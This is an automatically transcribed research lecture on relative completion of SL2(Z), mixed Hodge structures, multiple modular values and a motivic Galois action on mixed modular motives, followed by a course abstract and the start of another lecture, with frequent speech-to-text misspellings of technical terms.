it's just saying that these x and y's carry weights essentially, it's not a big deal. But now the crux of the matter then is that the Eisenstein's generators also have a mixed Hodges structure, so they correspond to q of one. So that's the m and f Hodges numbers, they are again minus one and minus one. Right so this follows from the work of Steinbrink and Zucker on limiting mixed Hodges structures of curves. This is going to sit in weight, in geometric weight minus two and minus two. And then the cusp forms and that's really because it has a, the corresponding differential form has a pole at the cusp. It pushes the w weight up or down in this case. And then EF prime, EF double prime is going to be a copy of VF one where VF was the Hodges structure of a cusp form. So I defined in an early lecture the motive, I mentioned the motive of cusp forms, they have a Hodges structure. And they both take twisted by one. So the Hodges numbers of the motive of a cusp form twisted by one are two n minus one and minus one two n. And these are going to sit in w equals minus one. So this is pretty tricky and I have to admit that we don't really know how to extract all the information from these filtrations at present. You've got a sort of three dimensional picture with these three filtrations, it's quite hard to visualize. It gives a lot of constraints. Suddenly the m and w are going to play a very important role and give a lot of constraints. But I have the feeling that there's more to be extracted from this. So what I'm going to do now is maybe we have a brief break and I will draw a picture, if I can, of this Lie algebra with its Hodges structure. Which is a moment I've been dreading because it's quite hard to get it right on the board. So I can do that whilst you have a coffee and then when you come back you'll see a beautiful picture will make all these filtrations abundantly clear. So this is a drawing of the Lie algebra of G or more precisely of SL2, semi-direct U11 Dirac. So SL2 is up in weight zero. It's generated by these two differential operators, xd by dy and yd by dx. And their commutator is h, which is the degree in y minus the degree in x. Or the other way around. So then we have, so that's SL2 and the rest are the generators of U11 Dirac. So we ignore the Hodges filtration F for now. And we just look at the M weight filtration and the W going down the blackboard. So this is the geometric weight filtration and M is the monodromy weight filtration. Now the first thing to say is that negative numbers go to the right, that's a bad habit that we've got into but it's stuck. It's convenient to do it this way, it's harder to draw the other way. So negative numbers go down here but they go to the right and positive numbers to the left. And the first surprising thing which is that all the cusp forms are floating very high at the top. So the cusp forms are all sitting in W equals minus one. So for every cuspital generator you have an EF prime and an EF double prime. So EF here stands for both copies, it means EF prime and EF double prime. And we get some elements sitting way up at the top in the W filtration. Then the Eisenstein generators go way down in the W filtration. And the other thing to say is that this SL2 acts in the obvious way on these blocks. So xd by dy moves you left two blocks, yd by dx moves you to the right by two blocks and indeed this generates a standard representation of SL2. This generates a representation of SL2 of dimension three and so on and so forth. So here on the left we have highest weight vectors and the extremity we have lowest weight vectors which are annihilated by this operator here, yd by dx. So what I've drawn is the semi-direct product of SL2 on U11 Duram. So it's a free Lie algebra in the category of mixed-hot structures with an action of SL2. So the SL2 is up here at the top in orange, it's xd by dy and yd by dx and the commutator is an h which is the degree in x minus degree in y. And the h invariance is this red line here and the red line sits, so the red line is, watch, let me put it, so the red line is m equals w and it contains all the SL2 invariance. That's going to be important. So already we don't have any SL2 invariance in the generators. You have to take Lie brackets of at least two of these things to get an SL2 invariant piece. So the key point is that the Ison-Slide series go down in the w filtration very fast and they're all lined up to begin in the m equals minus two column next end to the right. But all the cuss forms are very much up at the top. And that's some very important fact that is just true and it's useful but I don't feel we've really fully exploited this very particular structure. I think there's a lot more information that can be obtained out of this. So this is m and w, then I've ignored the Hodge filtration f which I've written a little table there for convenience. So if you want to think of the Hodge filtration f, you can imagine another filtration coming out of the blackboard in three dimensions and these things are sitting at strange diagonals coming in and out of the blackboard if you have sort of a three dimensional picture with f as well. And I just don't know how to draw that on a piece of paper but if someone has an idea that would be useful. Okay, so this is what the Lie algebra of Dirac, the Dirac amount of completion looks like in all its glory or rather in most of its glory since we've ignored the Hodge filtration for this picture. Just as a remark by comparison, you know, if we were to draw the same picture for p1 minus three points, the Dirac fundamental group is just the freely algebra on two generators E0 and E1. So the corresponding picture for this, we only have one filtration, we only have m and we just have E0 and E1 sitting in one slot. So this is the analogous picture for p1 minus three points is that. It's not very interesting but we see this incredible richness on m11, on SL2Z. So what we've got then is this object that just exists, it's a motive, it's a drama realization of a motive and the Galois group is going to act on this, this whole thing and clearly it's very rich indeed. So now I want to try to describe, I forgot to say, so of course these are just the generators and then you have Lie brackets, you have commutators between these elements. So the Lie bracket of E4 x squared and E6 x to the four will be somewhere in W minus ten and it'll be over here in this column. So for example you have E4 x squared Lie bracket and so on and so forth. So when you take Lie brackets of Eisenstein elements, they're going to move to the right. So you say that the action of SL2Z on V1 is a natural one. No, so to get SL2 to act, I need to choose a splitting. So we had, yeah so it's slightly cheated here or I hadn't until I wrote down a commutator. But we have G Durand 11 and it sits in an exact sequence SL2, so I put a Durand for bookkeeping purposes and it has a unipotent radical. But then what we can do is then to write things, to compute it's always useful to split this. So we choose a splitting and I mentioned this last time. But the fact, what's new here, so SL2 acts on the right, let me have SL2. What's new now is that we have hod structures. So the fact of the matter is that you can always choose a splitting compatibly with all the M, W and F filtrations. So you can split compatibly with W, M and F. And then once you've chosen a splitting, that's the same thing as choosing an action of SL2 on U. And on the level of the Lie algebra, you get this guy and that's what I've drawn. No, but how much I've mentioned it, SL2Z. Ah, SL2Z, sorry. No, there's no action of SL2Z per se. No, it's really an action of SL2, the Lie algebra. Yeah, so SL2Z will appear but in a different, in a slightly different way. So that's SL2 acts on V1, acting in a natural way. That's correct. So that's really the betty, so SL2Z is really the betty side because SL2Z is the fundamental group and you always get a map from the fundamental group into the betty, into the Q rational points of the betty relative completion. But this is, I've drawn Durham here, so it is not the best way to think about it in the Durham picture. So the way that SL2 acts, so this is what I explained last time, so how does SL2Z act here? Well, in fact, you're right, but maybe I'll recap. So I did this last time, SL2Z acts here via these co-cycles. So we had SL2Z going to G betty 11Q and then via the comparison, that gave us something in G11 Durham C isomorphic to SL2 Durham semi-direct U11 Durham C and so every element, every matrix gives us gamma, I call this gamma bar because there's some irritating 2 pi i's but in this basis you won't see them. And then a co-cycle C gamma. So this co-cycle somehow, if you think of it the path gamma ends up being spread throughout the whole Durham picture. So the path S, which we had last time, is going to do what you think it does up here on the SL2 part and then it's going to have some, the co-cycle CS is going to spread it out with all these periods all through the Durham. The connection between the SL2Z and the Durham SL2Z. That's gamma. That's gamma goes to gamma bar, so I explained that last time. It's essentially the same matrix but with 2 pi i's in there and then I switched, I've switched bases, these Durham and betty bases and that eats up the 2 pi i's. These 2 pi i's are 5 such, they're all 1. Exactly, exactly. It's just bookkeeping. So that's sometimes, so here I'm writing the bold X's and last time when I did the co-cycle I wrote it using the other X and Y but these are essentially the same and these differ by multiplying or dividing by 2 pi i. Exactly, that's the origin of the 2 pi i which is very irritating but it's very important. Right so now let me describe the Galois action then. So Galois and inverted commas, it's not a classical Galois group in any sense. So G1 run Durham is Durham component of a pro-object in H. Therefore it has an action of the automorphisms of the category H. So this action knows everything. This is the holy grail. If we could understand this action we would know everything there is to know about mixed model emotives. So this action, I'll just write that quickly, knows everything, it completely determines the structure of G11 as an object of H and hence the category which I mentioned a few lectures back, so define a category of mixed modular motifs, MMM gamma, I'll mind you the definition here. It's just a full subcategory of H generated by the affron ring OG11. So that means it's all sub-objects and quotient objects, duals, tensor products thereof, etc. So that's what I define to be the category of mixed modular motifs and understanding this category is equivalent to understanding this action. Of course we can enhance this category H, I'm just working with Betty and Durham because it's the quickest way to get information about this action. You can throw in other realizations if you like. So then the question is how on earth could we possibly compute this action? And it seems hopeless but in fact surprisingly you can get very far. So I'm going to restrict the action, not of the full Gallo group but just look at the unipodent radical. And I feel like saying that the action of the semi-simple part, we sort of know that. It's not much to say, it's really encoded by the action of HEC operators and it's understanding the pure objects in this category and they are the motives of modular forms which we know. So all the interesting stuff is in the unipodent radical. And its action on, so the unipodent radical acts on everything in sight and it's going to determine all the extensions in this category. And that's what we really want to know. Right? Okay, so how do, what do we know about this action? Well we know that it respects, it has to respect the local monodromy. So we know a few other things as well that I haven't had time to discuss but most of the content is in this little picture that I'm going to draw. So we have the local monodromy. So this is the fundamental group of GM just given by a single loop. And we had this map local monodromy into G11. And I'm going to call this local monodromy Kappa for want of a better name. And then G11 is an extension of SL2 by its prune-unipodent radical. And what does this local monodromy look like? Well it takes a little loop in the Q disk which I called gamma zero and it sends it as I explained to T here. But it also has a component up here which is interesting and complicated. So this morphism from G11 to SL2 is a morphism in H. And this is a subgroup in the category H. Everything here, every morphism in this diagram is compatible with the Hodge theory and come from morphisms in the category H. So that means the metallic Gallo group, Gallo group of H, respects all the maps in this diagram. And in fact we can be much more precise that in fact SL2 which is just the, it's our fine ring is given by endomorphisms of this vector space V. So it's just a tape motive. It's very simple. And as I explained earlier, this fundamental group of the punctured disk, they are both taped, well first of all they're pure objects and even simpler they're pure tape objects in H. So they're incredibly simple and the action of this metallic Gallo group on them factors through a very, very small quotient. And in particular, since for simplicity I'm only going to look at the unipodent radical, the unipodent radical of this category acts trivially by definition on all pure objects. So it's going to act trivially on both SL2 and this pi1 or rather their diram components is it acts trivially on all pure objects in H by definition, that's the definition of U. It's the subgroup which acts trivially on pure objects or direct sums of pure objects. Okay so now definition, if I have an exact sequence of affine group schemes over K, where K has characteristic zero and S is reductive or pro-reductive and U is pro-unipodent. So this is the situation we've got with G11 over there and what we've got then is this automorphous, this group of symmetries acts trivially on this and therefore in particular it preserves this subgroup. So we want to understand when you have an affine group scheme acting on a short exact sequence of affine group schemes, what does it look like? So if we take any short exact sequence of affine group schemes of pro-unipodent, kernel and pro-reductive quotient and in fact this is the general picture for any such group scheme, then we can define the automorphisms which respect pi of G and they are the automorphisms of the group scheme G, so these are group homomorphisms such that pi alpha equals pi. Now when I write this what I mean is for every ring, I'm looking at the, we can take the ring R, we can take the R points of this group scheme and we're looking at automorphisms on the level of points. So what this is is a functor, but I write it without reference to the ring of points you're taking in, so it's a functor from commutative K-algebras to groups and one has to be careful here, it's not the case in general if you take a group scheme, it's automorphisms is not a group scheme, but there are conditions under which it's true, in which it is a representable functor, in this case it's going to be representable, so it's not a problem, but I don't want to go into that, so I'll just say that this is, or for me is a functor from commutative K-algebras, so given a commutative K-algebras R, the automorphisms of R are the isomorphisms of the R points of G to itself which commute with this projection. And you say that this is it's representable? It is, I have to think, yeah I think it is in this case, yeah. Certainly in the application it's definitely representable, so somewhere I wrote down some conditions, so if you take, you can prove that, so if you have a pro-unipotent group scheme it's automorphisms are representable and there's a general question, if you have some filtrations on the group schemes then there's a condition for representability that I wrote in some paper and that's on the archive. And in this case I think it's fine, I didn't actually check. But for the case of SL2Z, the case we're going to apply this to, it's definitely representable. I'm just saying that one has to be a little bit careful. And when you think of automorphisms, these are automorphisms on the level of points, you could also ask, well anyway I don't want to go into it, there's some subtle questions related to this, which just don't arise here. So then the theorem is that for every splitting sigma of this, sorry I make s act on the right, I think, for every splitting of this what is that sequence, there is a canonical isomorphism of this automorphism group with u, semi-direct, s invariance of u, or u, s invariance. So what this means is that the automorphisms of u, s invariance is the isomorphism, the automorphisms of u to itself such that they commute with phi, so the s-equivariant. So what are elements in this thing, so first I'll write down elements in u, semi-direct, or u, s, and then I'll explain what this superscript means. So what they are on the level of points they're given by pairs, b, phi, where b is in u and phi is an equivalent automorphism. And this is an equivalence relation, so we say that a pair b, phi is equivalent to ba a inverse phi a, so this is conjugation by an element a for any a, s invariant element of u. So these pairs b, phi they form a group with the obvious semi-direct product, the usual semi-direct product law, and modulo an equivalence relation which is multiplied on the right by an element of, an s invariant element of u and conjugate by an s invariant element of u here. And we denote the equivalence class by square brackets b, phi. And what we get then, because the action of this group here preserves, respects pure objects and this is pure and this is pure, it's going to act on g in such a way that it commutes with this projection pi and it's going to fix the image of kappa. So to say that in equations, what we get is a map from the Durand Galois group to a certain automorphism group a Durand which is a subgroup of the pi respecting automorphisms of g11 and it's the subgroup of autos, automorphisms which do, which first of all they've got to respect the, the, the hodge, the hodge structure and more precisely the weight filtrations w and m, they don't have to respect the hodge filtration f but they have to respect w and m and they have to preserve, so what I mean is that they, they preserve kappa and they respect, so they respect w and m, what I meant to say is, and they preserve kappa, they leave it invariant. So in my paper there's an extra condition that we know that these automorphisms satisfy that I'm not talking about. So in my paper a actually means something else plus an extra condition, unless there's not time to explain that. So we can make this concrete then, so if we pick a splitting g11 Durand SL2 Durand u11 Durand then we can write down this group in quite a concrete way using, using the theorem over there. So let, so here we have t and kappa plus be the image of a generator gamma of pi1 Durand and this kappa plus is, is really another word, kappa plus really equals the co-cycle CT which we partly computed last time, just a slightly different notation, the context is very slightly different. But you can think of this literally as, as this, this power series CT which we computed and it's, it just involves some complicated expressions and Bernoulli numbers. And, and well we computed part of it, I mean it also involves, it also encodes Peterson inner products. So concretely then what a, a Durand then via the previous term can be written as being the W and M preserving elements in u11 Durand, semi-direct, u11 Durand SL2, ort, u11 Durand SL2. i.e. in other words, it's the elements, every motivic automorphism can be represented by an equivalence class B comma phi, where B is here and phi is here, such that it preserves kappa. In other words, it satisfies equation B slash t phi kappa plus B inverse equals kappa plus. And that's the condition, this is the condition that the Galois group preserves the image of, of this under the morphism kappa. And so this defines a group, a subgroup of automorphisms of relative completion and it really is the analog, it's, it's a genus one analog of the Gottten-Dicht-Eichmann group. Okay. So to explain this definition a bit more carefully, let me explain how it acts on co-cycles and it should, should enlighten the discussion somewhat. So the point is that this is actually a massive constraint on what these motivic element, these motivic automorphisms can possibly look like. And this, this condition that looks innocuous is in fact extremely restrictive. So as a, as a remark, let's explain how this automorphism group acts on co-cycles. So we get an action of this automorphism group and in particular these equivalence classes on co-cycles. Non-Abelian co-cycles, z gamma one u1 1 duran. So I explained last time how a splitting gives you a, a splitting of g as a symmetric product gives us co-cycles. And therefore the automorphism group is going to act on the space of co-cycles. So how does it, if we start off with a co-cycle c, non-Abelian co-cycle, then b phi is going to change c and give us a new co-cycle. So we take a non-Abelian co-cycle and we transform it to get a new one. And the new co-cycle, so if the old co-cycle is the map g goes to cg, then the new co-cycle is g goes to b slash g phi cg b inverse. So this is c prime g. So this is how this group of automorphism acts on co-cycles and it's a very easy but quite nice exercise to check that this operation indeed preserves the co-cycle equations. The one way to think about this, which I think is the most enlightening, is that the space of non-Abelian co-cycles is, you can think of this as a total space over a base which is the non-Abelian co-homology classes, equivalence classes of co-cycles. And the way I think of this action, or one way to think of this action, which is useful, is that the element phi is giving us an automorphism of the co-homology class and the element b is twisting the representative of the co-cycle within that co-homology class. So that explains this dual nature of this automorphism. Phi changes the point in the base and then b selects a point in the fiber. So we see immediately that this group respects, so we think of this group as a group action on multiple modular values and it's clear from this that it respects the relations between multiple modular values, at least those that come from the co-cycle equations. So perhaps since I have a tiny bit of time, let me just sneak in how this acts on an example of a co-cycle because I think it's very enlightening. So we had, last time we computed the co-cycle of an Eisenstein series and I hope I got my normalizations the same as last time, if not I apologize. So what it looked like, so this co-cycle was obtained by integrating an Eisenstein series from zero to infinity and it was 2 pi i times some rational co-cycle, which I defined explicitly, plus some constant times an odd zeta value over 2 pi i to the 2n times a co-boundary. And I explained last time that this was, this is in some sense, this is rational, so this is 2 pi i rational and this is a co-boundary and it's transcendental. And I also explained that the co-homology class of this co-cycle is just this piece, this is zero and co-homology and that's consistent with the Mann and Drinfeld theorem, this should be a rational co-homology class. And the way it's said that this comes from a Tate motive, so its period should just be 2 pi i rational. But this has a non-trivial transcendental part, which is a co-boundary. So if we unravel this formula, the motivic Galer group is going to act on these co-cycles and what it does is it scales all the, well it does something to all the generators e and f and in this case it's going to do nothing because to lowest order phi is always the identity so we're not going to see this at all in this example. And then it multiplies by, it modifies by a co-boundary. So if you take the coefficient of e2n plus 2 in this, what you find is that the co-cycle stays put, it's the same thing that comes in here, then you get plus b slash g minus b which is the addition of a co-boundary. So under, so what b phi does to this, it modifies this co-cycle by a co-boundary. So what it does is it adds, i.e. it takes this co-cycle and when you compute c prime, it's going to be the same thing plus, so c prime equals c plus some constant times 2 pi i boundary of y to the 2n, okay. And so duly you can interpret that as an action of the motivic Galer group on the number on the odd zeta value. And so that's equivalent to saying that the motivic Galer group transforms the odd zeta value and modifies its value by adding some multiple of 2 pi i to the 2n plus 1. And as we know, or as you might know from my other lectures, that this is indeed how the betty motivic Galer group acts on motivic multiple zeta values. So this is, so in some sense the fact that the co-cycle of an Einstein series has this transcendental term in it is really fundamental because it reflects the first non-trivial piece of the action of the motivic Galer group. Right, so now let me retranslate these, so these are all groups of automorphism acting on groups. It's simpler to think in terms of Liege Algebra. Liege Algebra reformulation. So now let me take g11 to be Liege 11 drams. I'm going to drop the drams because it gets a bit tedious. Oh no, okay, I'll keep the drams and why not. u11 is the Liege Algebra of the unipotent radical of the relative completion and uH is the Liege Algebra of this unipotent radical of this Galer group. Then if we translate all the above stuff into Liege Algebras, then we get an action of this Liege Algebra u drams H on the Liege Algebra of relative completion via in the following extremely specific way. So it, having chosen a splitting as before, it's going to map to this semi-direct product. And then it goes to the SL2-equivariant derivations of this Liege Algebra. So given an element sigma, it will always manifest itself in the very specific form of B delta where the equivalence relation on these derivations is that B delta is equivalent to B plus A delta minus adjoint of A for any A in u11 SL2 invariant. Now this, this equivalence relation shouldn't frighten you because as we see from this picture here, there are actually not very many SL2-equivariant elements in this Liege Algebra. You have to go quite far, you have to take quite complicated commutators before you even see the first invariant element. So we can really sort of ignore this as a first approximation. And as I'll explain, we can also think of deltas on approximation as well. And so the, the, the material elements can really be thought of to first order in terms of just an element in this Liege Algebra, which, which we understand fairly well. Sorry? Sigma on the left. Oh, this is the equivalence relation. No, I'll just say it. Oh, sigma, sigma is some element in here. But it doesn't appear on the map. So sigma maps to, along this map, sigma. So sigma is an element of the Liege Algebra of automorphons in this category. I don't see sigma in the result. No, it should depend on sigma, I suppose. B sigma delta sigma, yeah. Yes, you're right. It, it, this, the B and delta depend on sigma, but I'm just saying if you give A sigma, let me call the image B delta. And the image of this, but there was this inertial condition. The image lands in the subspace of derivations satisfying the Liege Algebra version of this condition, which is B comma n plus delta n equals zero. This is the inertial condition where n is the logarithm of T kappa plus. And I claim that we can, we can write this down more or less explicitly. It's, it's, it's something like, I actually didn't prepare again, but it's, it involves a sum of e2n plus 2x to the 2n with some Bernoulli number factor here and some, some coefficient. So n, n to lowest order is a power series that involves all the Eisenstein series with some Bernoulli number coefficient coming in here. So this is something that's, this element n is something quite concrete and we know a lot about it. So we have a Liege Algebra of derivations that respect this condition. This is something very concrete, you could put this on a computer if you like and, and unexplore it. And now define UMM, respectively, it's Liege Algebra, UMM to be the image of UH. So this is, so UH we've got. So what is UMM? Another way to think about it is that U, UMM is the Liege Algebra of the unipotent radical of Aught tensor MMM of omega diram. So the, the, the category of mixed modular motives as I defined it earlier is a Tanakian category. It's completely determined by its, its, its Galois group and this is the, this is the unipotent radical. So this beast completely describes all the extensions, well it describes everything about this category but it, it, in particular it gives us all the information about extensions and iterated extensions in the category MMM gamma. So the holy grail is to, to get a presentation right down generators and relations of this Liege Algebra. If we knew that then we would know exactly which, exactly the, the structure of the category of mixed modular motives. So that's exactly what I'm going to try to do now. First I want to explain on this geometric picture what this constraint is. So every, the upshot of this is that every, I'll call these mativically elements, UMM, can always be represented by a pair B delta. So as Kathy pointed out I should have the dependence on sigma but I'm, I'm lazy. And what we think of, we call B sigma is the geometric part and delta sigma we call the arithmetic part. No reasons for this. So let's draw a picture. We can, in the same spirit we can draw a picture of the Liege algebra, of the derivation algebra of this Liege algebra. I'll put it up here. So if the Liege algebra has a mixed-hot structure then its derivation algebra also has a mixed-hot structure. In other words the derivation algebra of this is an object of the category H. And if we draw a picture of it with the M and W filtrations then we have this line M equals W. That's the line in red on this picture. And given any, if I have some mativically element here, if I want to ask what are the possible, what are the elements of a given type, of a given weight. So they'll be in a certain M column, they'll be in a fixed M column and they will look like this. So we have the delta part. So the delta part is SL2-equivariant and as I mentioned earlier if you're SL2-equivariant you've got to lie on the diagonal. So the delta part entirely sits, the arithmetic part sits in this slot here. And then we have all this stuff here which is ad of B. And we call the, so what I should say, when I write an element like this I'm really choosing a splitting of the W filtration but the intuition is perfect. The top part which is canonical is called the geometric head. And then, so there's all this stuff given by B, this is just given by an element of the Lie algebra U. And then there's an arithmetic part which is mysterious, slightly mysterious. And then there's all the rest, there's an infinite tail that goes down in the W filtration. So that's the picture of a mativic Lie algebra element. And I emphasize, you know, to draw this picture what it implicitly means is that we split the W and M filtrations. But that's fine, as I explained earlier. So now it gets fun because we have all these filtrations and all these constraints and we can do some detective work on what possible durations there can be. And the first point is the inertia condition implies a whole bunch of stuff but two things that are very important. And the first one is that the geometric head, so a bit up there, is always a lowest weight vector. So that already poses a strong constraint on what durations are possible. So here we see we could have an element sigma whose geometric head is this gadget here. And in fact, there is such a one, it exists and it corresponds to the zeta 3 extension we saw earlier. And you could ask whether there's a derivation whose geometric head is this element here. Turns out there can be no such element. And so on and so forth. And the other fact that the inertia condition gives is that this infinite tail is in fact uniquely determined. So once you know what it looks like sort of above the diagonal, then you know all the rest. So that's determined by this inertia condition, b, n, delta, n equals 0. All right, so at last then I can state a theorem about what we know about these durations. Oh, sorry, yeah, no, I missed a key point. I'm slightly out of time. I'll just get to the punch line. So the point is that an element sigma in the abelianization of MMM is equivalent to extensions in the category MMM of SL2z. So we really desperately want to know exactly what derivations are possible because it tells us how to construct extensions, which is an important problem. And so to exhibit, I won't explain the machine, but to construct such a non-trivial element, the key point is that you have to compute a period. You compute a period which is essentially a regulator. And that's an analytic argument, and that enables you to deduce that some element actually exists as non-zero. That's image as non-zero. Okay, so there's a whole machine to do that. The conclusion then is theorem one. There exists. So these are non-canonical. Their abelianizations are canonical. So there exists, first of all, we have zeta elements. So I call these sigma 2n plus 1 in UMMM for all n, and they have a hard structure. They are of type Q2n plus 1. And what do they look like? Well, they have the geometric head minus 2 over 2n factorial, Eisenstein y to the 2n, plus dot, dot, dot. There's a geometric part. We know the next term, I think, I think I know the next term in this, essentially nearly all of it in any case. And then there's an arithmetic part, and then there's an infinite tail. And the arithmetic part, I actually know this to first order. So I know how it acts on this algebra, and it's extremely interesting. And it involves some very bizarre quotient of two different Bernoulli numbers, somewhat bizarrely. And these correspond to zeta 2n plus 1. Another way to say it is that in the category MMM, they correspond to extensions of a tape motive by 2n plus 1. So it shows that these extensions exist in the category MMM. And, equivalently, the odd zeta values appear as multiple modular values. And the proof is, we nearly did it. The proof is obtained by computing an integral of an Eisenstein series, and that produced, in the co-boundary part, it produced this odd zeta value. And that shows that these derivations, the machine, that shows that they exist and they're non-trivial. Then there's something completely new, which are modular elements. So they come in sort of pairs for all f cusp form of weight. Sorry, for every cusp, we had a basis of cusp forms with rational coefficients. And the integer d is any integer bigger than equal to the weight of f. And what do these look like? Let me just write down the one with a single prime, the double prime is identical. So we get some, the geometric part is some coefficients that are perfectly computable. And then we get a commutator, E f prime, y to some power, an Eisenstein part, y to some other power, times x1, y2. So this is the notation I mentioned in an earlier lecture, to some power, plus dot dot dot. So the geometric head then is a commutator of cusp form of Eisenstein series. And you get a whole bunch of them, and the coefficients that occur are the coefficients that turn up in the period polynomial of f. So these are non-trivial, and they correspond to the L values L fd. So these derivations are, they are of type, they are of modular type. And they prove that there are non-trivial extensions in mmm of q by vfd for sufficiently large d bigger than the weight. So and the proof of that is Rankin-Selberg, or variant of Rankin-Selberg. So there are no elements, there are no possible derivative elements that have just a cusp form as their geometric head. They do not exist. So there do not exist elements with a geometric head of the form ef prime or double prime y to the 2n. And that has a lot of important consequences, but I'll skip that. OK, then theorem two, which is an analog of the Delaney-Harris conjecture in P1 minus 3 points, is that we can deduce Freeness. The zeta elements and the modular elements generate a free, a free least subalgebra. So this is great because it means that the corollary is that there exists a huge supply of mixed modular motives. So essentially these are mixed modul, these are motives of mixed-tate modular type. And it's saying that if you, if you specify extension data, arbitrary extension data, then you can construct at least one example of a mixed modular motive with an iterated multi-extension with whatever extension data you like. So yeah. So it basically says we have the, there's some caveats there, but it says that the, the, the category of mixed modular motives is doing what it should. It's generating every single example that we can hope to find, which leads me on to my next question. Can we expect to find all the extensions as predicted by Baylinson? As predicted by Baylinson's conjecture. So the point is that the story doesn't just stop here. There shouldn't be zeta and modular elements, but there should be a whole infinite sequence of, of more and more generators. In fact we should expect to find extensions in MMM of the trivial object by symmetric powers and I'll just write down the final theorem and stop. So we should get extensions of this type, or suddenly they should exist somewhere in nature. And the question is, do they occur in relative completion? And these should correspond to derivations if they occur, if they can be exhibited as mixed modular motives. Sigma v in UMM. And here comes the spanner, theorem three, which is very surprising. And the answer is no, that was absolutely astonishing to discover, that if we write the weight of each modular form fi, call it ni, sorry, 2 ni plus 2, then define a quantity L of v to be 2d, which is the take twist here, minus sum 2ik nk plus 1. Then if L of v is less than minus 3, I think it might be less than or equal to, but I have a doubt. Then these extensions cannot occur. So this is extremely surprising. It means that if Benenson is right and that these extensions exist as motives, then in fact we cannot find them in this geometric setting. And I have no idea where in nature, where to find such things. And the funny thing is that this condition, there's a formula due to Carlton that tells you what the rank of this X group in the category of real mixed-watch structures is. So we know what the dimension of this space should be. And when this condition is satisfied, it's almost always zero. So it's very unusual that you expect to see some extension that is ruled out by this theorem. They're very rare. So there's a tiny fraction of motivic extensions that should be out there that we cannot capture using relative completion in this way. And this is a big mystery. I think the first time such an extension happens, so the way that this can happen is when you have many modular forms whose weights are very close to each other and d is very small. And then occasionally you can be in this no-go zone of this theorem. But in the generic case, when d is very large, there's absolutely enough space in this derivation algebra for them to exist. And I expect them to exist, and I expect them to generate a freely algebra. So the questions I raised at the beginning of the lecture, does relative completion generate all mixed modular motives? Well, the answer is yes and no. Yes, in the sense that we have these types of freeness theorems that show that you get pretty much everything once you have the simple extensions. But not all the simple extensions seem to be there in the first place. And that's an absolute mystery. And place to stop.
|
In the `Esquisse d'un programme', Grothendieck proposed studying the action of the absolute Galois group upon the system of profinite fundamental groups of moduli spaces of curves of genus g with n marked points. Around 1990, Ihara, Drinfeld and Deligne independently initiated the study of the unipotent completion of the fundamental group of the projective line with 3 points. It is now known to be motivic by Deligne-Goncharov and generates the category of mixed Tate motives over the integers. It is closely related to many classical objects such as polylogarithms and multiple zeta values, and has a wide range of applications from number theory to physics. In the first, geometric, half of this lecture series I will explain how to extend this theory to genus one (which generates the theory in all higher genera). The unipotent fundamental groupoid must be replaced with a notion of relative completion, studied by Hain, which defines an extremely rich system of mixed Hodge structures built out of modular forms. It is closely related to Manin's iterated Eichler integrals, the universal mixed elliptic motives of Hain and Matsumoto, and the elliptic polylogarithms of Beilinson and Levin. The question that I wish to confront is whether relative completion stands a chance of generating all mixed modular motives or not. This is equivalent to studying the action of a `motivic' Galois group upon it, and the question of geometrically constructing all generalised Rankin-Selberg extensions. In the second, elementary, half of these lectures, which will be mostly independent from the first, I will explain how the relative completion has a realisation in a new class of non-holomorphic modular forms which correspond in a certain sense to mixed motives. These functions are elementary power series in $q$ and $\overline{q}$ and $\log |q|$ whose coefficients are periods. They are closely related to the theory of modular graph functions in string theory and also intersect with the theory of mock modular forms.
|
10.5446/51000 (DOI)
|
Some rambling, some trap. That's just really sick. That's just Okay, I'll start now. So this is lecture three. And I will begin with some brief reminders, a brief recap of what we did last week. And then the theme today will be to focus on periods. So the main objects in this business are a pair of affine group schemes and a comparison isomorphism between them. So more precisely, we had G11B, which is the relative completion of gamma equals SL2Z. And with respect to the inclusion, the natural map row into the Q points of the algebraic group SL2. So B stands for Betty. This is just the group completion that I defined in the first lecture. But it has an interpretation as local systems, as I explained in the second lecture. Okay, so this is an affine group scheme. So it's a pro algebraic matrix group or projective limit of algebraic matrix groups over Q. And it is equipped with a Zariski dense homomorphism. Which I didn't give a name, but maybe rotelda from gamma into its rational points. So we think of this group as some sort of algebraic, whole algebraic envelope of SL2Z. Of course, an affine group scheme is just given by, determined by its affine ring, which is simply a commutative whole algebra. Okay, so then the other group in the game is the DRAM relative completion, which I defined in terms of algebraic vector bundles with an integral connection on M11. Satisfying some conditions. And it's the DRAM relative completion. Again, it's an affine group scheme over Q. So once again, it's given by a commutative hopfazerbr. These two things are related as follows. So there's a canonical isomorphism that I called comp. Which after extending scalars to C is a canonical isomorphism between these two group schemes. So these two schemes become isomorphic after extending scalars. Then we know something, more we know something about their structure by the definition of relative completion. In both cases, we have an exact sequence. They are extensions of the algebraic group SL2 by something which is pro-unipotent. In both cases. So this is pro-unipotent. In other words, it's a projective limit of unipotent matrix groups. A unipotent group is always conjugate to, you can always represent it by a subgroup of the group of matrices. I remind you with ones on the diagonal and the rest above the diagonal. That's a projective limit of these things. So here I've written SL2B and SL2DR. So this can be confusing, but it actually clarifies things considerably. In both cases, it's just SL2. So SL2 betit SL2 DRAM is just the group SL2. The index is just to keep track of where we're working. And it's because in this comparison, which sends SL2 to SL2, SL2 betit SL2 DRAM, the comparison is non-trivial. So it's very useful to keep track of which copy we're working with. So it also says that the comparison respects this decomposition. So comp maps U11 isomorphically onto U11, etc. And finally, we know something about the structure of, we know how the general shape of these groups. So the easiest way to write this down is to define little U to be the Lie algebra of the unipotent radical of the DRAM parts. Then this is isomorphic to the completion of the A freely algebra on generators coming from modular forms. So last time I called them, there were generators corresponding to Eisenstein series and each of them comes with a copy of a standard representation of SL2 of rank 200 plus 1. And there were, for each cusp form, there's a two-dimensional space of such representations. So if you choose a basis, you've got two generators for every cusp form of weight 2n plus 2. And this corresponds to Eisenstein series of weight 2n plus 2. So this is for n bigger than or equal to 1. Right, so these generators are not canonical. That's important to emphasize. Okay, so this lecture is going to be entirely about trying to understand this isomorphism comp. And that's going to give some interesting numbers. So the definition is the follows. The ring of multiple modular values. So I'm not entirely sure how to denote these. Sometimes I think I write MMV gamma, possibly, I've written in one place or other Z gamma, possibly. So this is a ring of numbers, a subring of c. So smallest ring r containing c such that, smallest q-algebra such that the comparison map is defined over it. So g. Otherwise, it's all the numbers that turn up in the comparison map. Maybe a more satisfying way to say this is the comparison map is, induces a map on the affine rings that goes in the opposite direction. So if you take an element in the affine ring of the DRAM group and you apply the comparison map on the level of the affine ring, then you get something in this q-algebra and certain coefficients which appear. And r is the ring, sorry, MMV gamma is the ring generated by all those coefficients. Okay, so this ring does not have a canonical basis in any way. So for now it's just a ring. And what I want to do is sort of dig down into this and try to make, understand as much as we can about it. So the first thing we can 